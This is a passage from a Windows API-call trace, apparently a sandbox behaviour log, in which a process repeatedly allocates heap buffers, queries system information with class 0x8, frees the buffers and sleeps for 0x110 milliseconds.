ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.335] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.335] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.335] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.335] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.336] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.336] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.336] Sleep (dwMilliseconds=0x110) [0227.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.345] Sleep (dwMilliseconds=0x110) [0227.367] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.367] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.368] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.368] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.375] Sleep (dwMilliseconds=0x110) [0227.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.410] Sleep (dwMilliseconds=0x110) [0227.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.439] Sleep (dwMilliseconds=0x110) [0227.450] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.450] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.451] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.457] Sleep (dwMilliseconds=0x110) [0227.480] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.480] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.481] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.489] Sleep (dwMilliseconds=0x110) [0227.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.519] Sleep (dwMilliseconds=0x110) [0227.528] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.535] Sleep (dwMilliseconds=0x110) [0227.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.547] Sleep (dwMilliseconds=0x110) [0227.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.568] Sleep (dwMilliseconds=0x110) [0227.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.584] Sleep (dwMilliseconds=0x110) [0227.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.595] Sleep (dwMilliseconds=0x110) [0227.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.612] Sleep (dwMilliseconds=0x110) [0227.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 